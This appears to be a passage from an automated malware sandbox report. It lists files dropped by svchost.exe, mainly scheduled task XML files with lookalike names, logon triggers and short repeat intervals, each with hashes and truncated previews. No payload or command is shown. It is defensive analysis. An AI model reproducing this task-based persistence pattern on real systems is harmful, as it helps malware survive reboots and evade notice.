SHA-512:	DE4192709CFC313B636A9F6AD0AF564D9516B59284812653A32D2A8C21FBBE2D5F58AABD3156154ADCF8E4145DA8947627CC84684BEE04E344EDD43ECD1BD7A8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.3.0.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.L.B.U.S.-.P.C.\.a.l.b.u.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.A.p.p.l.i.c.a.t.i.o.n.F.r.a.m.e.H.o.s.t.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.

C:\Windows\System32\Tasks\ApplicationFrameHostA

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3572
Entropy (8bit):	3.566962881237316
Encrypted:	false
SSDEEP:	48:yei1q97p9nWdmURQSRi6lVw9RnknD9V9Lvarx+i3iudupRCRvA9ufAuRa7T5XhPO:tNudRiMeRnknNGki3igVA9ll7dhFl+
MD5:	EC4A761C2A2D143E3434762653A6E387
SHA1:	645ECEFEE12872A9253D593A84946D04ECD185EA
SHA-256:	37DD50051EC542E65DFDB59727A0D33CF5CCAB797C75BEB77F2E25F5EB621F99
SHA-512:	EB0FE8D1E58FA2884622EC1BA8AFD4B90608F046B3F17A98268B38AEE293828F9D15EE152408E5482F19FAB31D67AA7BC54BFF4DAFE275F6EB8713D2C4714818
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.3.0.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.L.B.U.S.-.P.C.\.a.l.b.u.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.A.p.p.l.i.c.a.t.i.o.n.F.r.a.m.e.H.o.s.t.A.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.8.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.

C:\Windows\System32\Tasks\ComComponentDriverInto

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3328
Entropy (8bit):	3.5816781968273226
Encrypted:	false
SSDEEP:	48:yei1q97p9ck2QnRi6lVab9RnknD9V9Lvarx+i3iudupRCRvA9ufAuRa7T5XhPsV3:tBnRiMEpRnknNGki3igVA9ll7dhFm2+
MD5:	B05E7E7F3DA609154EE4187CDCD68730
SHA1:	EA8D8303E2A262BC4493CA673944B4741F07DB87
SHA-256:	C30E14D2D37302B2C07D9A36C4AFE5C22A3FF57664CA88E66DB6846662A7B043
SHA-512:	0C37966478949D6A99143712270C637238B79859760E4C9FBDE7AFA234228FCDFCBEC3693E4F2E602D681077091E661CC4026C0E740DB00F0BDA62BFFE43EC93
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.3.0.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.L.B.U.S.-.P.C.\.a.l.b.u.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.C.o.m.C.o.m.p.o.n.e.n.t.D.r.i.v.e.r.I.n.t.o.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.

C:\Windows\System32\Tasks\ComComponentDriverIntoC

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3586
Entropy (8bit):	3.56390557534578
Encrypted:	false
SSDEEP:	48:yei1q97p9ckNmMQSRi6lVw9RnknD9V9Lvarx+i3iudupRCRvA9ufAuRa7T5XhPst:tsMdRiMeRnknNGki3igVA9ll7dhFm2+
MD5:	0D6441ADC0C4A1D73A08CA55D33895F6
SHA1:	EA78CA5C82F6D2B3DB4FA774BA33B90C7EABB570
SHA-256:	5DBEAD0D91DDA26CB9C2E0642A2ADB2A06F8F53FCD9CFB6C11EF46EA8506D149
SHA-512:	30A34038DA0C4E94D389C6EEBECCD63E5753CFBE89FD780A0DB26C4CEB5F5B3B51874A21A7D2005490549E2FA204A3E454A034F20F3671BC509D0F7F8937F131
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.3.0.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.L.B.U.S.-.P.C.\.a.l.b.u.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.C.o.m.C.o.m.p.o.n.e.n.t.D.r.i.v.e.r.I.n.t.o.C.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.6.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.0.0.<./.S.t.a.r.t.B.o.u.

C:\Windows\System32\Tasks\explorer

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3262
Entropy (8bit):	3.581513012445583
Encrypted:	false
SSDEEP:	48:yei1q97pdjdQnRi6lVab9RnknD9V9Lvarx+i3iudupRCRvA9ufAuRa7T5XhPsV8E:tjKnRiMEpRnknNGki3igVA9ll7dhFmw+
MD5:	6E067CC28F370BB781A901665D8D7A79
SHA1:	2A1D86E6C056D9BD4B5B0E47F4DBC880B6D8FB0D
SHA-256:	E9E3AAE08ECB1FD19E1551E9EF8C239BA2318E1607A11F8FA95CCF19181F02B6
SHA-512:	404A36BBEBF7981B5F1A00FF0936388970361810BA3FE3458E3EF931CAAD49A74F0D42200A6F78AA10B8388FB97604399F4A7D03F3627B4866F7573169839556
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.2.9.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.L.B.U.S.-.P.C.\.a.l.b.u.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.e.x.p.l.o.r.e.r.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.

C:\Windows\System32\Tasks\explorere

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3522
Entropy (8bit):	3.562613741742207
Encrypted:	false
SSDEEP:	48:yei1q97pdjYmRQSRi6lVw9RnknD9V9Lvarx+i3iudupRCRvA9ufAuRa7T5XhPsVH:tjpRdRiMeRnknNGki3igVA9ll7dhFmw+
MD5:	4C859832B203947FC9C56DC5D28EAB08
SHA1:	36A199402B54F17123DBD67090D7AE8FE81AEA71
SHA-256:	8E740589B5B14DDB32B05616D5B4DFDC74CE920724B15FC17F103DFDB657A43A
SHA-512:	86C812A7B3D70717E3FC75BACAA1C92251496720A18E0C6E1A662CB6F2FC6A0C39AA47EAFA97B8C07E0A2E427031B0B44FFA44DF62394E4D99718C0BA933202C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.2.9.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.L.B.U.S.-.P.C.\.a.l.b.u.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.e.x.p.l.o.r.e.r.e.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.1.0.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . .

C:\Windows\System32\Tasks\launcher

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3252
Entropy (8bit):	3.581159047769704
Encrypted:	false
SSDEEP:	48:yei1q97p9oQnRi6lVab9RnknD9V9Lvarx+i3iudupRCRvA9ufAuRa7T5XhPsV8iI:tvnRiMEpRnknNGki3igVA9ll7dhFG+
MD5:	6D82CFA8D6E9A287D9984B3CF55F43A4
SHA1:	634F93475CC04306F44AF7106886B5A99C9A201C
SHA-256:	9216F81248578BBB658CD154E74177D2F72D26E1FE215093698A4DAC752FD95E
SHA-512:	EE81A2BCD4E2F5488D449025D37BFD6EA89ED8046C42B6597FB53379E9631D79995558EDCEA8C431907E7C86D61C91A850E32D3501F6E90260CA1643D9391347
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.3.0.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.L.B.U.S.-.P.C.\.a.l.b.u.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.l.a.u.n.c.h.e.r.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.

C:\Windows\System32\Tasks\launcherl

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3510
Entropy (8bit):	3.563533649585224
Encrypted:	false
SSDEEP:	48:yei1q97p91emZQSRi6lVw9RnknD9V9Lvarx+i3iudupRCRvA9ufAuRa7T5XhPsVW:tFvZdRiMeRnknNGki3igVA9ll7dhFG+
MD5:	10AAF2A6CDE69BBECEF67A9B091D73D2
SHA1:	BAAA4FB8982A7098CB3F174CD8F0ED62B1F5880D
SHA-256:	E553C4621C261F4A846EE3220C3A10C360A91CB7821FB01ADC9B9E3107A934E5
SHA-512:	729AA32CD9A25D7443520E9977C355D5157C497699A4BB4375A14ADC4283C7FDF947ACDF4B4694070A540688A1CB78336BF0FC72E6E7F005E2939768E35C10CC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.3.0.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.L.B.U.S.-.P.C.\.a.l.b.u.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.l.a.u.n.c.h.e.r.l.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.9.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .

C:\Windows\System32\Tasks\nuHgOHHpbRMTfX

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3314
Entropy (8bit):	3.5998450286034984
Encrypted:	false
SSDEEP:	96:thnRiMEpRnknNGki3igVA9ll7dhFnbjY+:TRyPyNw3UrhC+
MD5:	38072335C94E4A41E4A6E4FB078FE0AD
SHA1:	C5E4BC6A759D17209C8A89D15BC531141ADD6146
SHA-256:	BA3E47D3C43402804D654D373B70B7289DE6F5E1F8B79162951D1419448E4410
SHA-512:	07434C9496D2D9C8177AB50FDF2D4E4C96011DD1C5DAA04C9E0876AB7F2C4BA7AD39C5F00645F2A80709E125DDF3E94158D1D3EDC9B2C9D136DAC0CAD3DED045
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.3.0.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.L.B.U.S.-.P.C.\.a.l.b.u.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.n.u.H.g.O.H.H.p.b.R.M.T.f.X.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.

C:\Windows\System32\Tasks\nuHgOHHpbRMTfXn

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3572
Entropy (8bit):	3.5812555408499303
Encrypted:	false
SSDEEP:	96:tRudRiMeRnknNGki3igVA9ll7dhFnbjY+:7udRKyNw3UrhC+
MD5:	8FC069F004640B1703EB0BA774F30E2C
SHA1:	BDB9351DCEC5090D13B637A38A0E3C2FBDA2C5CA
SHA-256:	163E41B5B3CE1E5E7B110E6331139DA60742F4E73C0BB9242675CB937852E00B
SHA-512:	EBABC00861EA91CAC3640BCE5A3506BA722F9F95058340D08111F2FF529A4939210DEA1BD40D994F139BD17B63559A4439BD1C7E39AF162B94DFFCA411315E3B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.3.0.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.L.B.U.S.-.P.C.\.a.l.b.u.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.n.u.H.g.O.H.H.p.b.R.M.T.f.X.n.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.8.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.0.T.1.0.:.2.6.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>.....

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.9197577659456972
Encrypted:	false
SSDEEP:	6:kKUAfgQJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:MAIbkPlE99SCQl2DUevat
MD5:	FAF40A55C7AFD29C566540511C536185
SHA1:	DB54FE2ACFEE68A9A1E1E5541A59A2B3B0452110
SHA-256:	647B54C669DDDFF7A13FA421A662AF86A07DDC2BD8DA624A76B7623B8A55B64A
SHA-512:	E42A6DA6EE11ED6B74437859D093B054D9969D8A139F0BE1E2190F8AF33505211BF4DE538F503CCA88887D6FE38E92E99D2729346CF42246D6B4A0B1AB9675D2
Malicious:	false
Preview:	p...... ........so..~...(...............VK..sc..V.L..c..V..S.c..........V.L..c.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	416
Entropy (8bit):	3.9641445965447697
Encrypted:	false
SSDEEP:	6:kKbGS+sD4Iltcv/x84lXlRNfOAUMivhClroFFKIhipStaHAaloq09Slst6WLeam6:BDbMnmxMiv8sFFKbpgal7Bl7aWa
MD5:	3FFA1F6BAC11C0099A533F632DE10278
SHA1:	D2EAA60BBC9BC5BEA52D1F16CC365A38C7AB1DDA
SHA-256:	0FF3BF12DB6F2737284462BF09970070AF018CCCC33D4252DF0E06B2E29A4F40
SHA-512:	B0847739F336FF9409DF122ECC502071AD2748D1D6ECEAD5EF20F565086AE7347657542B226A418B28943C9FFA33439D1758168BABCCF67CF417E34A66633764
Malicious:	false
Preview:	p...... ....,...w.I tc..(.......2.........3........Hv......................Hv... ........6h.x... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.L.n.k.X.H.7.g.C.H.p.P.%.2.B.L.Z.g.4.N.M.U.M.A.%.3.D...

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.906911674856999
Encrypted:	false
SSDEEP:	6:kKN+ssElvXJtWplXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:VsMj2mxMiv8sFFKbpgal7BlwhZg
MD5:	324D766DF54BA8AF2178298479072AD9
SHA1:	A4999671D066A6F3D7D223E32320A2549A249938
SHA-256:	90A9B29C7443FAB6705747D8E91118C3087760DF3E62BA80486351B1CD592DA7
SHA-512:	D6E2F84FC90A7D69A453D266C3B1ECB6D3ECC9E3F5B4E18EFFA7DAF4BD99D8D0E75A160B9843C9ACE167EF6FE809C8BF27C087C1ADB5E36725B2739CE2F6CA16
Malicious:	false
